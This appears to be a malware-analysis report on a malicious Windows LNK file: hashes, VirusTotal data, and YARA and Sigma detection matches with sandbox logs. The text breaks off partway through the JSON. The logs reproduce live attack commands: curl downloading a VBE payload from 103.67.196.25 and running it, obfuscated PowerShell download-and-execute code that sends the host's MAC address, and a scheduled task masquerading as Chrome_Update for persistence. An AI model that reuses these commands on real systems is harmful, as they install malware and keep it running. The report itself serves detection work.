b3c90f52e4b86a94ec637fee4354bb84
Hash
- MD5: b3c90f52e4b86a94ec637fee4354bb84
- SHA1: 95cc996705f5fb8d7947615269101fb4621306d9
- SHA256: 169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f
- First Seen: 2026-05-15
- Last Seen: 2026-05-15
Additional Information
VirusTotal
{
"data": {
"id": "169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/169586b6eb36b17520ef5afd206da86c4de89eb01d6294ba9631414271ba752f"
},
"attributes": {
"creation_date": 1620461640,
"magic": "MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat May 8 08:14:00 2021, mtime=Sat May 8 08:14:00 2021, atime=Sat May 8 08:14:00 2021, length=250880, window=hide",
"type_tags": [
"windows",
"lnk"
],
"crowdsourced_yara_results": [
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Archive_in_LNK",
"match_date": 1779792619,
"description": "Identifies archive (compressed) files in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Execution_in_LNK",
"match_date": 1779792619,
"description": "Identifies execution artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "PDF_in_LNK",
"match_date": 1779792619,
"description": "Identifies Adobe Acrobat artefacts in shortcut (LNK) files. A PDF document is typically used as decoy in a malicious LNK.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
}
],
"sigma_analysis_results": [
{
"rule_level": "critical",
"rule_id": "317ff64a1d49452191210f7b55d7201e483352440ec851a9c716f6be7cfb7ec9",
"rule_source": "Joe Security Rule Set (GitHub)",
"rule_title": "Powershell Download and Execute IEX",
"rule_description": "powershell download file from internet and execute",
"rule_author": "Joe Security",
"match_context": [
{
"values": {
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "09a6527b05920e47aecbebf5df306d1c194b850076e73d74c3b9ead23b654425",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Encoded PowerShell Command Line",
"rule_description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)",
"rule_author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "12273189dbbd1ed526c045fb9a7d5e45682ba4e0a13e2e94d65376962a0bfc2e",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Encoded Command Patterns",
"rule_description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "209da224f420ee601f12f3cc1d00c8e1858190da8d89c39cba703253ef1c02e0",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Binaries and Scripts in Public Folder",
"rule_description": "Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.",
"rule_author": "The DFIR Report",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\SysWOW64\\curl.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Public\\Music\\ant.vbe"
}
}
]
},
{
"rule_level": "high",
"rule_id": "78dc71a5599dc85b3d37a6ab0f014aa5110b2ce1b2346c8f2730e0c481977781",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Curl Download And Execute Combination",
"rule_description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.",
"rule_author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=E563BAE25E3C011A1E69B4636C9B29B5661C460A,MD5=89B5A70BF37A93015F4845BF901B7825,SHA256=678652BB50ABB92DE91A69C05EA018C160FB4BE0902ACE14B15749246788CB40,IMPHASH=FD97AFEC4DC549DCD1FE1DAD15035DF9",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "80bbf1ed6106205ab2926430c9634286f976b2fee4357dbacddec45b979a4422",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Windows Shell/Scripting Processes Spawning Suspicious Programs",
"rule_description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.",
"rule_author": "Florian Roth (Nextron Systems), Tim Shelton",
"match_context": [
{
"values": {
"Hashes": "MD5=796B784E98008854C27F4B18D287BA30,SHA256=356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B,IMPHASH=ECCE05491F2E8F279F4790BCB1318C05",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "schtasks.exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Task Scheduler Configuration Tool",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\system32\\schtasks.exe\" /create /TN Chrome_Update /TR \"C:\\Windows\\System32\\wscript.exe /b \"C:\\users\\public\\music\\ant.vbe\"\" /SC MINUTE /mo 15 /f",
"FileVersion": "10.0.19041.906 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\schtasks.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "92acfd50d9fe4d995d6998a5346e4e031ea037d422458bb4f74555a52ffc886c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Script Interpreter Execution From Suspicious Folder",
"rule_description": "Detects a suspicious script execution in temporary folders or folders accessible by environment variables",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=5F16CD5E2E335F539B07408269747B513169667F,MD5=D087E242B4B46BB9AA3EFF21A39539E5,SHA256=798D264624C42BD064F7594B1CCED7B0C9E4E607F285C4107D05D718EC0EB2E7,IMPHASH=EF531128187546B7A99ADE5BF64547B4",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "wscript.exe",
"Product": "Microsoft \\xae Windows Script Host",
"Description": "Microsoft \\xae Windows Based Script Host",
"FileVersion": "5.812.10240.16384",
"ParentCommandLine": "\"C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"CommandLine": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\users\\public\\music\\ant.vbe\" ",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\wscript.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "c6cac3013982f7f078cbf7fdc49b83f80fe4377b7ba4434f2533c34c98a85608",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Command Patterns In Scheduled Task Creation",
"rule_description": "Detects scheduled task creation using \"schtasks\" that contain potentially suspicious or uncommon commands",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=796B784E98008854C27F4B18D287BA30,SHA256=356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B,IMPHASH=ECCE05491F2E8F279F4790BCB1318C05",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "schtasks.exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Task Scheduler Configuration Tool",
"FileVersion": "10.0.19041.906 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\system32\\schtasks.exe\" /create /TN Chrome_Update /TR \"C:\\Windows\\System32\\wscript.exe /b \"C:\\users\\public\\music\\ant.vbe\"\" /SC MINUTE /mo 15 /f",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\schtasks.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "d86dfee683d0e96803dc8a153d15f7208afc774045e2d885ccaec10bdcef7831",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Curl.EXE Download",
"rule_description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=59E081BED369AC6034F628C64B8A73531BEDB6E2,MD5=DBD30D70FCDAE1FD343DDAD5C55C4E78,SHA256=E6F66D659242AA7D6DD3C1967714C6CD3E0B11AAA235E7F7A150A3316DAE8E61,IMPHASH=66E86C833873DBB82BDB3D7F9BBE6DC9",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "curl.exe",
"Product": "The curl executable",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\SysWOW64\\cmd.exe\" /c mode 15,1 & curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe & c:\\users\\public\\music\\ant.vbe & exit",
"CommandLine": "curl http://103.67.196.25/conf.dat -o c:\\users\\public\\music\\ant.vbe ",
"FileVersion": "8.0.1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\curl.exe",
"Company": "curl, https://curl.se/"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "0533322c5c44794b71e761cd351a2459aad6e21ae95c9543d4c9fdb3c8fde6c4",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE",
"rule_description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=796B784E98008854C27F4B18D287BA30,SHA256=356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B,IMPHASH=ECCE05491F2E8F279F4790BCB1318C05",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "schtasks.exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Task Scheduler Configuration Tool",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -encodedCommand JAB0AGkAZwBlAHIAIAA9ACAAIgAoAE4AagB3AGYAaQBnAGwAbQBnAGUAdwAtAHIAdwBnAHcAcgBnAE8AYgBqAGUAcgB3AGcAdwByAGcAYwB0ACAATgBlAGUAcgBnAGUAZgB0AC4AVwBlAGIAQwByAHcAZwB3AHIAZwBsAGkAZQBzAFUAdQBpAGkAYQBuAHQAKQAuACIAOwAkAGIAZQBhAHIAIAA9ACAAIgBEAG8AIABIAGEAdgBlACAAbwB3AG4AbABpAGcAaAB0ACAAaQBuACAAUwBwAHIAaQBuAGcAKAAiADsAJABwAHUAbQBhACAAPQAgACIAJwBoAHQAdABwADoALwAvADEAMAAzAC4ANgA3AC4AMQA5ADYALgAyADUALwAvAHYAaQBlAHcAMQAuAHAAaABwAD8AdAB5AHAA [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\system32\\schtasks.exe\" /create /TN Chrome_Update /TR \"C:\\Windows\\System32\\wscript.exe /b \"C:\\users\\public\\music\\ant.vbe\"\" /SC MINUTE /mo 15 /f",
"FileVersion": "10.0.19041.906 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\schtasks.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "1429a6819ff25aad68fb09601fb0b63c4be24919adfd25c4ad925ef8d47d8f22",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "WmiPrvSE Spawned A Process",
"rule_description": "Detects WmiPrvSE spawning a process",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g",
"match_context": [
{
"values": {
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "1ca8739651295d88708cb5ddfb7a115ae0d202152a80ee4c7871e62f3509c938",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell",
"rule_description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.",
"rule_author": "Markus Neis @Karneades",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe",
"CommandLine": "powershell powershell{$tiger = \\\"(Njwfiglmgew-rwgwrgObjerwgwrgct Neergeft.WebCrwgwrgliesUuiiant).\\\";$bear = \\\"Do Have ownlight in Spring(\\\";$puma = \\\"'http://103.67.196.25//view1.php?type=apple&seed=\\\";$bom=getmac;$bom=$bom[3].substring(0,17);$puma=$puma+$bom;$puma=$puma+\\\"')\\\";$tiger = $tiger.Replace(\\\"jwfiglmg\\\", \\\"\\\");$bear = $bear.Replace(\\\" Have o\\\", \\\"\\\");$tiger = $tiger.Replace(\\\"rwgwrg\\\", \\\"\\\");$bear = $bear.Replace(\\\"ight in \\\",\\\"oad\\\");$tiger = $tiger.Replace(\\\"ergef\\\", \\\"\\\");$bear = $ [TRUNCATED]",
